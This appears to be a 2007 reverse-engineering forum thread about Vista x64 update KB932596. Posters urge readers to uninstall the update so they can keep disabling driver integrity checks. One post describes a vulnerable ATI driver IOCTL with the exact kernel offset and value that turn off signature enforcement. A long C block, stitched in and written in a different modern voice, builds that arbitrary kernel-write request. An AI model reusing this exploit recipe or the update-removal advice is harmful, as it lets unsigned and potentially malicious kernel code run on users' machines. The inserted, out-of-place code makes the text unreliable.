
View Full Version : Windows Vista x64 & kb932596


JMI
August 20th, 2007, 10:42
Taos, a member here and on Exetools, has posted the following warning about an update to Windows Vista 64 and Unsigned Drivers:

Do not install this update, reason? :
Be careful of the kb932596 "update": it stops the "bcdedit -set load options DDISABLE_INTEGRITY_CHECKS" option working, which a lot of Vista x64 users were using to load unsigned drivers, and the associated MS KB article doesn't see fit to mention the fact that this is probably the only thing this "update" does. KB932596 definitely breaks unsigned drivers.
If you use Google, you will see a lot of problems with this update.

Fortunately, he also posted a "solution":

"Enter into Programs & characteristics (programas y caracteristicas) under control panel (panel de control) add/remove applications.

Then see installed updates (ver actualizaciones instaladas). Click on kb932596 and then uninstall. This will remove this bug. ;-)"

Thanks taos!

Regards,

LibX
August 20th, 2007, 11:56
Hehe nasty and good to know thx

LLXX
August 21st, 2007, 02:30
Quote:
This update adds checks to this protection for increased resiliency in Windows.
That's the official line. I suppose their idea of "increased resiliency" is, to us, "make it harder for the user to do what she wants to her own machine".

LibX
August 21st, 2007, 08:43
Well, there is nothing that can't be patched; it's just annoying that you have to do it over and over again whenever that part of the OS is updated.
It seems they also blocked that officially signed Atsiv driver now.

tigerisme
August 21st, 2007, 20:28
thx good to know!

neviens
August 22nd, 2007, 06:03
Quote:
Originally Posted by JMI:
...
Do not install this update, reason? :
...
KB932596 definitely breaks unsigned drivers.


I think, this update is response to "Purple Pill":
_http://www.symantec.com/enterprise/security_response/weblog/2007/08/driver_signing_on_vista_64_ati.html

I took a look at it, ATI left a backdoor in one of its drivers (atidsmxx.sys v3.0.502.0)
to disable signature checks instantly via DeviceIoControl.
If anybody is interested, I can upload.

Code:
;"\\Device\\AtiDCM"
;IoControlCode=22E00Ch

CONTROLBUFF STRUCT

_rw byte ? ;0=read 1=write
_offset qword ? ;offset to r/w =(ntoskrnl.exe base + 1792F8h)
_data dword ? ;data to r/w (==0 to load unsigned driver)
_mode dword ? ;1=byte, 2=word, else=dword (==1 to load unsigned driver)
_padding byte ?

CONTROLBUFF ends
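
The struct above is the whole interface: one METHOD_BUFFERED IOCTL whose input buffer says "read or write this many bytes at this kernel address". The following is an added example (my own code, not ATI's driver and not part of neviens' post) that mirrors the MASM layout in C, decodes the IOCTL code into its CTL_CODE fields, and round-trips a request through a byte image. The one thing to get right is alignment: a MASM STRUCT with no alignment operand packs its fields back to back, so the buffer is 18 bytes with the qword at offset 1, and a naive C struct with natural padding would hand the driver a differently shaped buffer. The type and function names are mine, and the ntoskrnl base address used in main is a constructed placeholder, not a real value. The CreateFile/DeviceIoControl call that would actually deliver the buffer is deliberately not included; the point here is the wire layout, which is also what you would match on if you were inspecting requests to this device.

```c
/* Layout of the atidsmxx.sys AtiDCM control buffer and the IOCTL that carries it.
 * Added example; the names below are the author's own, not ATI's. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define ATIDCM_IOCTL     0x22E00Cu   /* IoControlCode from the post */
#define ATIDCM_REQ_SIZE  18u         /* 1 + 8 + 4 + 4 + 1 bytes: MASM STRUCT defaults to 1-byte alignment */

/* Packed mirror of CONTROLBUFF. The pragma is honoured by GCC, Clang and MSVC. */
#pragma pack(push, 1)
typedef struct {
    uint8_t  rw;      /* 0 = read, 1 = write */
    uint64_t offset;  /* kernel virtual address to access */
    uint32_t data;    /* value to write, or receives the value read */
    uint32_t mode;    /* 1 = byte, 2 = word, anything else = dword */
    uint8_t  padding;
} atidcm_req_t;
#pragma pack(pop)

/* Same fields with natural alignment: the naive port, whose shape the driver would not accept. */
typedef struct {
    uint8_t  rw;
    uint64_t offset;
    uint32_t data;
    uint32_t mode;
    uint8_t  padding;
} atidcm_req_naive_t;

/* Little-endian helpers so the byte image does not depend on host endianness. */
static void put_le(uint8_t *p, uint64_t v, size_t n) { for (size_t i = 0; i < n; i++) p[i] = (uint8_t)(v >> (8 * i)); }
static uint64_t get_le(const uint8_t *p, size_t n) { uint64_t v = 0; for (size_t i = 0; i < n; i++) v |= (uint64_t)p[i] << (8 * i); return v; }

/* Build the exact byte image the driver expects. Returns bytes written, 0 if cap is too small. */
size_t atidcm_encode(uint8_t *out, size_t cap, uint8_t rw, uint64_t offset, uint32_t data, uint32_t mode)
{
    if (cap < ATIDCM_REQ_SIZE) return 0;
    memset(out, 0, ATIDCM_REQ_SIZE);
    out[0] = rw;
    put_le(out + 1, offset, 8);
    put_le(out + 9, data, 4);
    put_le(out + 13, mode, 4);
    return ATIDCM_REQ_SIZE;
}

/* Parse a captured input buffer (e.g. from an IRP trace). Returns 1 on success, 0 on bad length. */
int atidcm_decode(const uint8_t *in, size_t len, atidcm_req_t *req)
{
    if (len != ATIDCM_REQ_SIZE) return 0;
    req->rw      = in[0];
    req->offset  = get_le(in + 1, 8);
    req->data    = (uint32_t)get_le(in + 9, 4);
    req->mode    = (uint32_t)get_le(in + 13, 4);
    req->padding = in[17];
    return 1;
}

/* Width in bytes the driver will access for a given mode field. */
unsigned atidcm_width(uint32_t mode) { return mode == 1 ? 1 : mode == 2 ? 2 : 4; }

/* A request is a kernel write when rw == 1; anything inspecting this IOCTL would flag these first. */
int atidcm_is_kernel_write(const atidcm_req_t *r) { return r->rw == 1; }

/* CTL_CODE fields: DeviceType<<16 | Access<<14 | Function<<2 | Method. */
unsigned ctl_device_type(uint32_t code) { return (code >> 16) & 0xFFFF; }
unsigned ctl_access(uint32_t code)      { return (code >> 14) & 0x3; }
unsigned ctl_function(uint32_t code)    { return (code >> 2) & 0xFFF; }
unsigned ctl_method(uint32_t code)      { return code & 0x3; }

/* Encode then decode and compare; 1 if the layout survives the round trip. */
int atidcm_roundtrip_ok(uint8_t rw, uint64_t offset, uint32_t data, uint32_t mode)
{
    uint8_t buf[ATIDCM_REQ_SIZE];
    atidcm_req_t r;
    if (atidcm_encode(buf, sizeof buf, rw, offset, data, mode) != ATIDCM_REQ_SIZE) return 0;
    if (!atidcm_decode(buf, sizeof buf, &r)) return 0;
    return r.rw == rw && r.offset == offset && r.data == data && r.mode == mode;
}

int main(void)
{
    const uint64_t ntoskrnl_base = 0xFFFFF80001000000ull;  /* constructed placeholder, not a real base */
    uint8_t buf[ATIDCM_REQ_SIZE];
    atidcm_req_t r;

    printf("packed size %zu (offset@%zu data@%zu mode@%zu), naive size %zu\n",
           sizeof(atidcm_req_t), offsetof(atidcm_req_t, offset), offsetof(atidcm_req_t, data),
           offsetof(atidcm_req_t, mode), sizeof(atidcm_req_naive_t));
    printf("IOCTL %#x: device type %#x, access %u, function %#x, method %u\n", ATIDCM_IOCTL,
           ctl_device_type(ATIDCM_IOCTL), ctl_access(ATIDCM_IOCTL), ctl_function(ATIDCM_IOCTL), ctl_method(ATIDCM_IOCTL));

    /* The request the post describes: write the byte 0 at ntoskrnl + 1792F8h. */
    atidcm_encode(buf, sizeof buf, 1, ntoskrnl_base + 0x1792F8, 0, 1);
    atidcm_decode(buf, sizeof buf, &r);
    printf("request: %s %u byte(s) at %#llx\n", atidcm_is_kernel_write(&r) ? "WRITE" : "read",
           atidcm_width(r.mode), (unsigned long long)r.offset);
    return 0;
}
```

Decoding the IOCTL gives device type 0x22 (FILE_DEVICE_UNKNOWN), function 0x803, METHOD_BUFFERED, with both read and write access bits set, which is the usual shape of a vendor "utility" interface; the dangerous part is not the code but that the handler takes an arbitrary kernel address and width from user mode with no check beyond being able to open the device.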

JMI
August 22nd, 2007, 07:12
Actually, MSDN Blogs says that the update in question is related to "Kernel Patch Protection" and not the ATI Driver issue. See:

http://blogs.msdn.com/windowsvistasecurity/archive/2007/08/16/driver-signing-kernel-patch-protection-and-kpp-driver-signing.aspx

"So I am reading a lot of stories that seem to have confused, or incorrectly aligned, Windows Vista driver signing and Kernel Patch Protection technologies. Whilst driver signing and KPP are complementary, they are not conjoined.

Driver signing provides a method to better identify the author/creator of a piece of software or code so that the author/creator can be approached in the event a reliability issue, vulnerability, or malware is discovered. Signing is not designed to confirm the “intent” of signed code (i.e. good or bad), or whether exploitable bugs or malicious code is present. Malicious or exploitable kernel drivers can lead to system compromise beyond disabling of code signing controls, since kernel driver code has access to hardware as well as all programs running as the user.

Kernel Patch Protection (KPP) helps protect code and critical structures in the Windows kernel from modification. Microsoft updates KPP periodically, based on internal and external research. You can read more about KPP here:

http://blogs.msdn.com/windowsvistasecurity/archive/2006/08/11/695993.aspx

http://www.microsoft.com/whdc/driver/kernel/64bitpatching.mspx

Perhaps the mix up is due to a confluence of events, or – put another way – the fact that we released an update to KPP at the same time that news about an ATI Driver issue appeared. The update to KPP has no relationship to the ATI driver issue or recent topics related to code signing.

These are unrelated events!

1: Microsoft issued a non-security update for Kernel Patch Protection (KPP), and an accompanying security advisory: Microsoft Security Advisory (932596)

2: Microsoft was made aware of an issue reported in an ATI driver that is potentially vulnerable. Microsoft was in contact with ATI to help address this issue and ATI have posted a fix in the v7.8 Catalyst Package that can be found here:

http://ati.amd.com/support/drivers/vista64/common-vista64.html,

http://ati.amd.com/support/drivers/vista32/common-vista32.html

I would like to highlight that the driver in question was not shipped ‘in-box’.

Russ Humphries"


Regards,